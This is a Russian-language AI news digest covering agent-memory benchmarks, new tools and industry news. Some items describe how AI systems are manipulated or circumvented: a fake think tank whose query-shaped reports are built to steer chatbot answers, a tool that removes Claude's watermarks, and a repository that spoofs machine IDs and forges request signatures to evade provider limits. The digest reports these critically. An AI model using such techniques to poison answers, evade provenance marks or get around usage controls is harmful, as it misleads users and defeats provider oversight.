Память агента: файлы против базы, с замерами. Огромное исследование с честными цифрами — редкий случай, когда кто-то реально сравнил подходы на одном стенде (pinglin.tw).

Сравнивали два способа. Файлы: модель сама решает, что запомнить, и правит текстовый индекс. Так устроена память в Claude Code, Cursor, Cline. Структурное хранилище: сохраняется всё подряд, потом ранжируется поиском.
Результат жёсткий. На тесте с полусотней сессий истории структурное хранилище дало 73,6% верных ответов против 44,9% у файлов. Разрыв почти 29 пунктов.
Но интереснее цена. Файловая память тратит 286 тысяч токенов на вопрос, потому что модель рассуждает при каждой записи. Структурная — 19 тысяч. В пересчёте на один правильный ответ: 665 тысяч против 27 тысяч. Разница в двадцать пять раз.
Где файлы всё-таки выигрывают — и это важно. Единственная категория, где они лучше: честное «я не знаю». Ранжированный поиск почти всегда вытащит что-то правдоподобное и соблазнит модель ответить. Формулировка автора: разреженная память получает дисциплину отказа бесплатно.
Практический вывод простой. Память маленькая, ваша личная, вы сами её правите — берите файлы. Память и есть задача, десятки сессий, вопросы требуют связывать разное — берите хранилище с поиском.
Если остаётесь на файлах, знайте про три грабли. Первая: грузится только начало индекса, около двухсот строк. Всё, что выдавилось за горизонт, есть на диске и практически недостижимо. Вторая: файлы-сироты — модель пишет заметку, которую ничто не индексирует, и больше её не находит.
Правило звучит так: проиндексировано — значит существует. И третья грабля: сохранённое не значит применяемое. Документация прямо говорит, что память это контекст, а не принудительная настройка.
И отдельная цифра для тех, кто верит чужим бенчмаркам. Замена читающей модели при побайтово одинаковой выдаче поиска сдвинула результат на 6,9 пункта. Разница между двумя разными хранилищами при этом — 0,3 пункта. Автор подытоживает: важнее не какое хранилище вы выбрали, а чем вы его меряете.
Инструменты и штуки
Ling-3.0-tiny — самая интересная маленькая модель дня. Гибридная схема на 7,9 млрд параметров, из которых на токен работают всего 1,3 млрд. Умеет отвечать сразу или включать пошаговое рассуждение. Главное — реально быстро крутится дома: на MacBook с M4 Pro выдаёт 86–90 токенов в секунду и занимает около 8,3 ГБ памяти при контексте 8 тысяч. Лицензия MIT. Попробовать бесплатно можно на OpenRouter под именем inclusionai/ling-3.0-tiny:free (Hugging Face).
Speko — «маршрутизатор для голосового ИИ», выпускник Y Combinator. Голосовой агент это связка из трёх моделей: распознавание, языковая, синтез речи. Speko замеряет 69 моделей и подбирает связку под ваш критерий: точность, задержка или цена. Разброс огромный: минута распознавания гуляет в цене в 17 раз, ошибок у лучшей модели 2%, у худшей 12,9%. Цена — плюс 5% к ставке провайдера либо 9 центов за минуту. Шлюз открыт и бесплатен (speko.ai).
Roboflow Playground — песочница, где один и тот же снимок и один промпт прогоняются одновременно через пять моделей из тридцати с лишним. Есть поиск объектов, описание, классификация, распознавание текста и свободный вопрос по картинке. Полезно ровно тем, что снимает стоимость проверки: не надо писать код под каждое API и поднимать инфраструктуру под открытые модели. Бесплатно (playground.roboflow.com).

Custom Agents в Antigravity — Google выкатила настраиваемых агентов в Antigravity 2.0 и в командной строке, редактор обещают следом. Это файловые конфигурации, которые задают роль со своими инструкциями, набором инструментов и ограничениями. Смысл — чистый рабочий контекст и меньше накладных расходов на токены. Формулировка Google: «настраиваемые агенты не заменяют скиллы и динамических субагентов, они дают ещё один уровень настройки» (Antigravity).
win-ocr — обёртка над скрытым движком распознавания текста внутри Windows, тем самым, что работает в «Ножницах». Считает на голом процессоре примерно 0,15 секунды на изображение: без интернета, без видеокарты, без прав администратора. Для тайского и восточных языков автор намерил ускорение примерно в тридцать раз против решения на видеокарте. Работает сразу после клонирования. Только Windows, лицензии нет (GitHub).
WorkbookLens — линтер и безопасный ремонт файлов Excel без самого Excel, без облака и без ключей от нейросетей. Пятнадцать правил: битые ссылки, странные формулы, зашитые числа, числа как текст, скрытые непустые данные. Правит файл прямым патчем и сверяет контрольную сумму каждой изменённой части. Формулы и макросы не исполняет никогда. Ставится в сборку как действие GitHub, Apache 2.0 (GitHub).
Pika Audio — Pika выпустила сразу четыре звуковые модели: саундтреки, музыка, звуковые эффекты и речь. Заявляют работу до двадцати раз дешевле конкурентов. Если вам нужна озвучка роликов или фоновая музыка без лицензионных хлопот, это стоит проверить хотя бы ради цены (Pika).
Blume — превращает папку с обычными markdown-файлами в полноценный сайт документации с поиском, темами и готовым SEO, одной командой. Собран на Astro и Vite. Хороший вариант, когда база знаний уже написана в текстовых файлах, а показать её надо людям (Product Hunt).
Mole — исследует вопрос за вами в рамках бюджета, который вы задаёте заранее в долларах, и выбрасывает любое утверждение, которое не может дословно сверить с источником. Вот это второе и есть главное: инструмент честно отказывается от того, что не проверил. Открытый код, бесплатно (GitHub).
claudeconfirm — маленькая и злая штука. Заставляет вас напечатать подтверждение, прежде чем откроется Claude. Смысл в том, чтобы поймать себя на автоматическом движении к нейросети по привычке, а не по необходимости. Бесплатно (GitHub).
Vocal Slice — режет подкаст или интервью прямо в расшифровке: выделяете нужные слова, получаете аудиофрагмент. Никакого звукового редактора не требуется. Бесплатный пробный период, дальше 29 долларов в год (vocalslice.com).
Chronock — сводит календари Google и Outlook в одно пространство, делает страницы бронирования из свободных слотов и сам предотвращает двойные записи. Простая вещь, но экономит нервы тем, у кого рабочая и личная почта живут в разных экосистемах (Product Hunt).
Talvo — подключается к 2500 европейским банкам, сам раскладывает траты по категориям и следит за бюджетом и капиталом. Данные хранятся в Евросоюзе. Актуально для тех, у кого счета раскиданы по нескольким странам (Product Hunt).
HarnessEval-W — нишевое, но настоящее исследование. Обвязка для оценки моделей мира и генеративного видео: вместо фиксированной метрики планировщик разбивает вопрос на подвопросы, порождает субагентов с инструментами, а старший агент проверяет доказательства и сводит вердикт. На выходе не голое число, а прозрачное дерево доказательств — видно, почему поставлен балл. Лицензия Apache 2.0 (GitHub).
Muse Glimmer 30B — предупреждение, а не находка. Модель мы разбирали 11 августа, но сегодня из репозитория удалили старые имена файлов. Если ваш скрипт или Dockerfile качал веса по прежним путям, он сломался сегодня ночью. И отдельно: у файлов, скачанных до 12 августа, битый шаблон диалога — их надо перекачать. Нужна сборка llama.cpp не старше b10353, иначе архитектура просто не опознается (Hugging Face).
Что мы проверили и решили не советовать. Два репозитория дня выглядели заманчиво и оказались пустышками.
Первый рекламировался как «модульный шлюз к пятнадцати моделям». Внутри — массовая регистрация аккаунтов и обход чужих лимитов: подмена идентификаторов машины, выкачивание токенов, подделка подписи запросов.
Второй оформлен как скилл для поиска нестабильных тестов. Внутри он возвращает зашитые в код строки: один и тот же «найденный» тест и одна и та же оценка на любом входе. Все семь коммитов сделаны в одну минуту.
Имена и ссылки намеренно не даём, чтобы не гнать на них трафик. Признак общий: свежий репозиторий, коммиты одной пачкой, красивое описание. Проверяйте код, а не значки.
LittleLearner — не инструмент, а наглядная игрушка, и она живая прямо сейчас. Исследователи обучили модель на 5 млрд параметров только на материале начальной школы. Всё, что проходят после пятого класса, из данных вычистили.
Мы упоминали работу вчера, но её стоит именно потыкать. Спросите про сложение дробей — получите безупречный ответ голосом доброй учительницы. Спросите производную синуса — получите «правило производной синуса это вычесть 2, ответ 8». Уверенным тоном. Лучшая демонстрация того, что на границе своих знаний модель не отказывается отвечать, а сочиняет. Оговорка: модель работает на сервере, а не в браузере (littlelearner-ll.github.io).
Новости и тренды
Амодеи вышел в X и назвал причину нелюбви к ИИ. Инвестор Гэвин Бейкер заявил в подкасте, что Дарио Амодеи якобы считает: однажды Anthropic останется единственной частной компанией в мире, а дальше только государства. Сотрудник Anthropic назвал это полной неправдой, а сам Амодеи ответил постом из двух частей, который собрал больше 10 млн просмотров (X).
Главное в ответе — не спор о слухе. Амодеи признал, что публика относится к ИИ плохо, но причиной себя считать отказался: «Я думаю, это фундаментально кризис доверия». И дальше самое честное: «мы ещё не выполнили свои громкие обещания принести пользу миру. Это целиком на нас».
Глянцевую кампанию он отверг: «сказать, что ИИ вылечит рак, скорее клише, чем вдохновение. Сработает — действительно вылечить рак». Проверяемое обещание: первые результаты в медицине «в ближайшие месяцы».
Израиль построил фейковый аналитический центр, чтобы кормить им чатботы. Сайт Hanover Institute выглядит как исследовательская организация: отчёты со сносками, таблицы, нейтральный тон. Ни один из ста с лишним отчётов не подписан автором. Мелкая оговорка внизу сообщает, что всё это заказано израильским правительственным рекламным агентством (Responsible Statecraft).
Механика важнее политики, её применят к чему угодно. Заголовки отчётов — это поисковые запросы: «Что вызвало перемещение палестинцев в 1948?». Подрядчик не скрывается, услуга открыто продаётся под названием «AI Story Optimization».
Что это значит: ответ чатбота на спорную тему — черновик поискового запроса, а не ответ. Красные флаги — нет авторов под текстами, сотня «исследований» за две недели, незнакомый домен с академическим тоном.
«Покажи, как 3M виновата на 0 процентов». Эксперт защиты в деле о взрыве в Хьюстоне, где погибли три человека, написал заключение с помощью ChatGPT. Это выяснилось в суде, когда адвокат истцов заметил среди четырнадцати тысяч страниц документ, который «выглядел как ИИ» (404 Media).
Защита выдала 350 страниц логов. Ключевой промпт дословно: «покажи, как 3M виновата на 0% во взрыве». Модель думала семнадцать минут. Счёт эксперта — 174 часа по 475 долларов при работе с моделью меньше часа. На допросе он признал: «если результат не соответствовал моему мнению, я его менял». Присяжные присудили истцам 61,5 млн.
Что это значит, и это не про юристов. Промпты можно истребовать в суде, а ссылки «поделиться» публичны: адвокат открыл его чаты прямо в зале. И на каждый день — правите промпт, потому что ответ не понравился, значит уже не исследуете, а подгоняете.
Дата-центр OpenAI в Огайо застрахован на 105 млрд долларов. 17 августа Nvidia раскрыла соглашение: гарантии остаточной стоимости по лизингу примерно на 4,25 гигаватта. Площадка — бывший завод по обогащению урана, лизинг на двадцать лет (SEC).
Мы писали 17 августа про слух о снижении. Цифра финальная: 105 млрд вместо обсуждавшихся 250 млрд, и только на первую фазу. Всю конструкцию объясняет одна строчка в документе: обязательства прекращаются, когда OpenAI получит кредитный рейтинг. Страховка нужна ровно потому, что рейтинга нет.
Что это значит. Лизинг на двадцать лет фиксирует высокую себестоимость надолго. Рассчитывать, что токены будут стремительно дешеветь, больше не стоит.
OpenAI заплатила 100 долларов за 4,2% Cerebras. В июле компания исполнила опционы: 10 033 508 акций по одной тысячной цента. Общая сумма наличными — около ста долларов. Подразумеваемая стоимость пакета — примерно 2,3 млрд (implicator.ai).
Долю OpenAI получила за недели до того, как показала тариф Ultrafast на железе Cerebras. Мы писали про сам запуск 14 августа, но денежная часть меняет прочтение. Что это значит: скорость, которую продают отдельным тарифом, рекламирует поставщик, в котором заказчик владеет долей. Независимых замеров качества нет, все сравнения делал сам Cerebras. Строится лестница тарифов по скорости, и привычный быстрый ответ становится платной опцией.
Из OpenAI перед размещением акций вымыло весь контур безопасности. За месяц ушли операционный и коммерческий директора, глава этики, глава систем безопасности и главный футурист. Команду по катастрофическим рискам расформировали, функции размазали по другим группам (Axios).
Мы отмечали отдельные уходы 12 и 16 августа, теперь виден масштаб: с начала года ушли минимум двенадцать старших руководителей. Что это значит: правила о том, что моделям можно и нельзя, пишут теперь те же люди, которым нужно показать выручку к размещению. Не закладывайтесь на то, что провайдер сам себя ограничит.
GPT-5.6 Sol подешевел вдвое. Стандартный тариф упал с 5 до 2,5 доллара за миллион входных токенов и с 30 до 15 за миллион выходных. Экономный режим — 1,25 и 7,5. Это меняет расчёт из блока про зрение выше (OpenRouter).
Что это значит. Sol стал дешевле Claude Opus 5 при почти равном уровне, а разрыв с младшей моделью линейки сжался с 2,5 раза примерно до 1,25. Держались за младшую ради экономии — повод пересобрать настройки. Две ловушки: скидка действует только на серверы самого OpenAI, а после 272 тысяч токенов в промпте цена удваивается.
Потолок открытых моделей теперь китайский. Из того же отчёта Hugging Face: почти каждый месяц 2026 года крупнейшую открытую модель выпускала китайская лаборатория, а не американская (Hugging Face).

Что это значит. Размер перестал быть отличием: Xiaomi, Ant Group и Meituan перевалили за триллион параметров, хотя год назад их на этой карте не было. Зато у американцев неожиданный лидер по числу релизов — производители железа: AMD и Nvidia выпустили по двести с лишним моделей каждая. Открытые модели стали способом продавать чипы.
Память подорожала на 500% за год. Комплект на 64 гигабайта стоил меньше 200 долларов прошлым летом, сегодня — больше 1100. DDR4 подорожала на 120–180%: туда побежали те, кому не досталось DDR5 (Tom's Hardware).
Мы писали 8 августа, что память до 2027 года раскуплена ИИ-компаниями. Через десять дней виден счёт, и прогнозы стали хуже: глава SK Hynix называет 2027-й худшим годом в истории отрасли. Что это значит лично вам: сценарий «докуплю памяти и буду гонять модели дома» экономически сломался. 1100 долларов за 64 гигабайта — это пять лет подписки по 20 долларов в месяц, и это без видеокарты. Берёте ноутбук — переплачивайте за память сразу, докупить потом нельзя.
Anthropic обвинили в войне с открытым ИИ — и один пункт обвинения подтверждён. Длинный разбор политики компании собрал 145 голосов на Hacker News. Большинство пунктов там — интерпретации, но один факт проверяется и он серьёзный (HN).
10 июня Anthropic выпустила Fable со скрытым механизмом: запросы про разработку передовых языковых моделей получали умышленно ухудшенные ответы, без уведомления пользователя. После скандала компания за сутки откатила механизм и признала «просчёт в компромиссе».
Метафора автора точная: «представьте компилятор, который выдаёт худшие бинарники, когда думает, что вы собираете конкурирующий компилятор». Вывод не про политику, а про зависимость: качество вашего инструмента — продуктовое решение провайдера, а не константа.
Ускорение от ИИ — 2 раза, а не 4. Команда, написавшая прогноз AI 2027, обновила модель сроков. Мы отмечали факт обновления 17 августа, но цифры внутри интереснее самого факта (AI Futures).
Разброс оценок огромен. Замер METR — от 1,04 до 1,2 раза, медиана прогнозистов — 2,0, самооценка сотрудников Anthropic — 4. Важнее другое число: время удвоения ускорения — пять-шесть месяцев. Реальность при этом идёт на 75% от прогноза, и сильнее всего отстаёт именно ускорение труда.
Что это значит. Планировать найм под четырёхкратное ускорение — значит верить самому оптимистичному самоотчёту заинтересованной стороны.
Anthropic продвинулась по гипотезе Римана. Невыпущенная модель компании добилась реального прогресса в 150-летней математической задаче с призом в миллион долларов (WSJ). Вместе с гипотезой Крузе это складывается в сюжет дня. Роль человека в математике смещается от производства доказательств к их проверке.
Amazon режет корешки редким книгам ради обучения моделей. Компания оптом закупает печатные книги, срезает переплёты для быстрого сканирования и уничтожает экземпляры. Журналисты отследили партию редких книг спрятанной меткой до склада в Лас-Вегасе (the-decoder).
Что это значит: бумажная книга больше не гарантия, что текст не попадёт в обучающую выборку. Издаётесь — проговаривайте право на сканирование в договоре отдельно.
ChatGPT на маке пишет каждое нажатие клавиши открытым текстом. OpenAI запустила Computer History. Она пишет клики, набор текста и переключения между приложениями, чтобы дать модели память о недавней работе. Хранится это незашифрованным (документация OpenAI). Функция включается по согласию, но если вы её включили — считайте, что весь ваш рабочий день лежит в открытом файле на диске.
Удалятель водяных знаков собрал 11 тысяч звёзд за считанные дни. Anthropic описала, как работает маркировка текста Claude. Почти сразу открытый инструмент для её снятия взлетел на GitHub (X). Тема тянется с 11 августа, и это её закономерный итог: маркировка появилась, обход появился следом. Практический вывод для тех, кто сдаёт тексты заказчикам: ни маркировка, ни её отсутствие больше ничего не доказывают.
Коротко. США готовятся уведомить 35 стран-партнёров, что придётся выбрать между американским и китайским ИИ (Neowin).
Google, по слухам, зовёт AMD проектировать следующее поколение своих чипов (Tom's Hardware). Qwen3.8 27B получила первый независимый замер — 52 балла, лучший результат в своём размерном классе, но API-провайдеров пока ноль (Artificial Analysis). Тесты показали, что ассистенты предпочитают спонсоров пользователям: одна модель рекомендовала более дорогие спонсорские продукты в 83% случаев (arXiv).